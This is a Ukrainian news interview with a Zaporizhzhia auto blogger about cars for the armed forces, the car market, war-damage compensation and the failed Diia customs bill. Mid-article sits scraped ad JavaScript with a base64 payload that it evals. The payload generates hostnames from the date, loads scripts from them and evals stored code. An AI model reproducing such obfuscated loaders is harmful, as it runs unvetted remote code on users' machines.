Машини для ЗСУ, компенсація за пошкоджені автівки й розмитнення через «Дію», – інтерв’ю з запорізьким автоблогером

Минув рік як триває війна Росії проти України, яка щодня вбиває сотні безвинних людей, руйнує домівки, автівки та життя українців. Впродовж цього часу, гортаючи стрічки соціальних мереж, новинних пабліків, можна побачити, як небайдужі збирають кошти на придбання автомобілів для військових, адже вони постійно знищуються ворогом. Також від ракетних ударів страждає чимало цивільного транспорту. Тож ми вирішили дізнатися як придбати авто для ЗСУ, як змінився ринок автівок чи розробила держава якісь проєкти по відшкодуванню за понівечені автомобілі або створила пільгові умови для придбання нових транспортних засобів постраждалими. Співрозмовником став брокер та автоблогер Олег Кічук.

Олег вже декілька років веде свій блог на Ютюбі й має аудиторію в 124 тисячі підписників, але його ролики збирають мільйони переглядів.

Вже рік триває війна. Наскільки наразі актуальна ваша професія?

-Безумовно, війна має великий вплив на нашу діяльність також. Але ми не змінювали напрям своєї діяльності, бо країна потребує автомобілів. Вони потрібні і військовим, і волонтерам, і громадянам, тому ми продовжуємо займатися тим, чим і раніше. Але обсяги автомобілів, які імпортуються, звичайно, зменшилися, як і весь ринок в Україні. Також збільшилася кількість консультацій, бо люди, які виїхали з України і повертаються, волонтери та військові, які завозять автомобілі, не стикалися з розмитненням, вони не знають як це робиться і звертаються до нас за допомогою.

Дуже потребують автомобілів наші військовослужбовці.
Скільки наразі завезено машин для ЗСУ і яка процедура придбання автівок для
військових?

Щодо кількості автомобілів, які завезли для Збройних сил України, то, наскільки мені відомо, митниця звітувала у грудні, що загальна кількість автомобілів, які було завезено і для ЗСУ, і для громадських об’єднань, фондів, організацій, становила більше 60 тис. авто. Але вони не виділяли окремо скільки саме на ЗСУ, бо так чи інакше, ці автомобілі працюють на нашу перемогу. Щодо процедури – вона простіша, ніж звичайне розмитнення, бо непотрібно звертатися до брокерів, вносити кошти. Автомобіль потрібно лише зняти з обліку в країні, де він продавався і оформити експортну декларацію з країни, з якої він імпортується. На кордоні від руки заповнюється декларація, там треба вказати дані про перевізника автомобіля і хто його отримувач. Це може бути військова частина, треба знати її точні дані, ГО або фонд. Потім, коли автомобіль передається кінцевому власнику, потрібно отримати акт «прийому-передачі», щоб не було питань де подівся цей автомобіль, чи може ви його продали, чи розібрали по запчастинах, чи ще щось. Взагалі, процедура дуже проста та швидка, головне – правильно заповнити всі документи, щоб не було ніяких проблем у подальшому.

Для ЗСУ, в більшості, купляють позашляховики або пікапи.
Чи є тенденція росту цін на такі автомобілі закордоном?

Це болюче питання,
бо справа навіть не в тому, що якось виросли ціни, а просто немає вибору, бо
вигрібли все. Спочатку купували найдешевші, потім середньої цінової категорії,
а вже зараз купляють і дорогі, бо треба ж на чомусь їздити. Влітку була така
проблема, коли ще діяло безкоштовне розмитнення для звичайних громадян, то
тягнули з-за кордону багато чого і це, звичайно, свою справу зробило, продавці
підняли ціни, і на позашляховики, і на звичайні автівки. Але потім, коли
закінчився термін пільгового розмитнення, ціни якось врегулювалися і наразі є
лише дефіцит нормальних позашляховиків, щоб вони ще і коштували якихось
адекватних грошей. Сьогодні складно знайти позашляховик, щоб він був в
нормальному робочому стані за дешево.

Наскільки зараз змінився ринок авто в нашій країні? Які
автомобілі користуються попитом?

Безумовно, ринок
автомобілів в Україні змінився за час війни, ми це бачимо і з власного досвіду,
і з цифр, що надають офіційні джерела. Насамперед, ми дивимось статистику
Інституту дослідження авторинку України і цифри не дуже втішні. Ми бачимо, що
ринок зменшився майже вдвічі. Наприклад, у грудні 2021 року загальна кількість
проданих авто, це і нові, і імпортовані, і внутрішні перепродажі, становила
трохи більше 160 тис. авто, а за грудень 2022 року це вже 89 тис. Це 55 % від
довоєнного часу. Що стосується попиту на окремі типи і категорії автомобілів,
то я б їх розділив на нові та вживані. Серед нових автомобілів, які продаються
у салонах, найбільший попит на кросовери та позашляховики. Із вживаними авто
дещо інша ситуація. Популярністю користуються автомобілі, які коштують до 5
тис. доларів. Зазвичай це авто, рік випуску яких від 2000 до 2008 року.
Традиційно це Volkswagen Passat, Reno Megan, Skoda Octavia, Volkwagen Golf. Тобто ті автівки, які українці знають, люблять і вони
давно вже в ходу. За часів безкоштовного розмитнення, яке було у 2022 році, дуже
великий попит був на Audi A6 та Audi A4. Вони дещо дорожчі, навіть вживані, але їх дуже багато
і в Європі, і їх частка суттєво зросла в нашій країні саме за час безкоштовного
розмитнення. Отакі зміни відбулись.

Кожен власник авто має страховий поліс, адже це
обов’язковий документ для керування транспортним засобом. Чи є пошкодження автомобіля
від ракетних атак страховим випадком?

Що стосується автомобілів, які
були знищені внаслідок ворожих атак, то це складна ситуація. Я знаю, що
Міністерство юстицій рекомендувало збирати якнайбільше доказів, щоб можна було
потім відшкодувати це майно. Це фото- відеофіксація, виклики поліції, якщо є
така можливість. Якщо немає, хоча б наявність двох свідків і взяти з них якусь
розписку, що це саме внаслідок ворожої атаки сталося. Що стосується саме
відшкодування страховою, то в мене немає такої інформації, знаю лише те, що
зараз збирається доказова база на майбутні суди, щоб це компенсувати за рахунок
країни-агресора. Що стосується саме страхових випадків, то може якісь поодинокі
випадки є, але мені про це невідомо. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Днями Верховна Рада прийняла закон про компенсацію за зруйноване та пошкоджене майно. Чи є якісь закони або проєкти, які будуть повністю або частково компенсувати втрачені автівки внаслідок ворожих атак?

Є декілька законопроєктів, які в майбутньому зможуть дозволити безкоштовно розмитнити один автомобіль людині, яка його втратила через війну. Такі законопроєкти є і їх декілька. Але тривають суперечки у Верховній Раді: як саме це зробити, коли, кому надавати таке право, кому ні. Те ж саме стосується і військових. Хочуть, щоб військовослужбовець зміг один автомобіль розмитнити для себе безкоштовно без права продажу на рік або на два. Це лише законопроєкти і про це ще рано говорити. На жаль, в них немає чітких термінів, щоб можна було зрозуміти, коли це почнеться.

А чи є якісь пільги на придбання авто для постраждалих?

На даний час
пільгових умов на придбання авто для звичайних громадян немає, є лише те про що
ми з вами раніше говорили – це безкоштовне розмитнення для ЗСУ, для ГО, фондів,
для пожежних частин, для медичних центрів, тощо.

Нещодавно нам анонсували розмитнення авто через мобільний
додаток «Дія». Розкажіть в чому суть цього законопроєкту.

Так, дійсно
анонсували, але не підтримали. Суть полягала в тому, що буде суттєве зменшення
тарифів на автомобілі, особливо на ті, які користуються попитом. Зараз це авто
віком 15-20 років. Я б виділив три ключових моменти, які стосуються розмитнення
автомобілів через «Дію». По- перше, він унеможливлює корупцію на митниці, тому
що всі розрахунки проводяться в електронному форматі по твердим цифрам і від
митника нічого не залежить. По-друге, це те, що зменшиться сума платежів для
бюджетних автомобілів, які зараз дуже потребують українці, це недорогі авто, але
вони якісніше, ніж ті жигулі та москвичі, і які зараз їздять нашими дорогами.
Тобто автопарк України покращиться і стане більш новішим. Зараз на старі авто
дуже велике мито через акциз який ввела ще Ніна Южаніна за часів Петра
Порошенка. Одже старі, але більш якісні авто будуть більш доступні для
українців. По-третє, це те, що не буде потрібен брокер, в декілька кліків
людина зможе самостійно заповнити декларацію через свій смартфон, інші дані
самі підтягнуться, так само сплатити розмитнення. До того ж, сподіваюсь,
шахраїв, які беруть передоплату за розмитнення і зникають, теж стане менше.

Ви вже сказали, що не підтримали розмитнення через «Дію».
Так, дійсно, 24 лютого відбулося голосування за цей законопроєкт, однак ВР,
як-то кажуть, «провалила» його. На вашу думку, чому так сталося? І чи можна
чекати, що щось зміниться з цього питання?

Так, дійсно, депутати не підтримали цей законопроєкт. Запитати в них напряму ми не можемо, але ми можемо зробити висновки, проаналізувши факти, які зараз в наявності. Отже, в нас є запис трансляції з залу Верховної Ради, де було обговорення цього закону та остаточні цифри по голосуванню. Я трохи детально зупинюсь на окремих моментах, бо гадаю, що саме в цьому є відповідь на питання чому ж не пройшов закон. Щодо голосування, ми бачимо, що «Слуга народу», зважаючи на те, що в них 237 депутатів своїх, а потрібно було 226 голосів, то вони могли і самотужки прийняти цей закон, але лише 169 депутатів від «Слуги народу» підтримали цей законопроєкт, інші або були відсутні, або утрималися, або чогось не голосували. Ми бачимо, що у складі «Слуги народу» є відомі правозахисники і ті, хто пітримує автомобілістів. Яскравим прикладом є колишній автоблогер ЗП Санек, нині – депутат Олександр Куніцький. Він завжди підтримував все, що стосується автомобілів, розмитнення і т.п. А тут чомусь він не голосував. Не зрозуміло чого? Бо цей закон якраз для його аудиторії. І я бачу, що на його сторінках у соціальних мережах дуже багато запитань від його підписників чому він не голосував, але він чомусь утримується від відповіді.

Також серед доповідачів під час прийняття закону від партії «Голос» виступав Ярослав Железняк. Він розуміє, що цей закон дуже потрібен, і якщо навіть там є якісь недоліки, вцілому, він дуже гарний і його потребує Україна. Але під час свого виступу він казав, що після прийняття цього закону, дешеві автомобілі будуть вартувати у розмитнені так само, як і преміальні дорогі автівки. Але це неправда. Ми рахували, дешеві авто будуть ще дешевші, ніж зараз, а дорогі авто будуть коштувати як зараз або деякі навіть дорожще. Це не несе аж такого навантаження на бюджет. Тобто не буде  такого, що багатії будуть платити менше, а бідні люди дорожче. Це не є правдою.

Далі від партії «Європейська солідарність» виступала Ніна Южаніна, яка є автором діючого закону про розмитнення. Вона теж доволі активно критикувала цей законопроєкт, використовуючи маніпуляції. Я б теж хотів прокоментувати її виступ, бо вона сказала, що зараз діє корупція, митники беруть по 300 доларів, з її слів, за те, щоб занизити митну вартість і щоб, ухилитися від податків. Але незрозуміло, чому вона про це каже, коли цей закон, який стимулює корупцію, написала саме вона.

Отже, підсумовуючи, бачимо, що виступаючі ввели присутніх депутатів в оману і цей закон не підтримали. Адже зрозуміло, що всі депутати не можуть бути спеціалістами в цьому питанні і вони також роблять свій вибір виключно з того, що вони чують від своїх колег, які, начеб-то, більше розбираються у цій темі. А результат маємо такий, що якихось 10 голосів не вистачило, щоб цей закон пройшов. Голова ВР хотів, щоб його хоча б направили на доопрацювання, але там не вистачило 1 голосу і закаон пішов у небуття. Нараз активісти розробили петицію до Президента, щоб він своїм наказом розробив процедуру переголосування цього законопроєкту, або його доопрацювання, а потім переголосування, або таким, який він є, його переголосували. Петиція є, ми надамо посилання на неї. Тож, є надія, що цей закон будуть переглядати і буде доступне розмитнення для звичайних українців. (adsbygoogle = window.adsbygoogle || []).push({});

Автор: Христина Монастирна Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/mashini-dlya-zsu-kompensatsiya-za-poshkodzheni-avtivki-j-rozmitnennya-cherez-diyu-interv-yu-z-zaporizkim-avtoblogerom/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top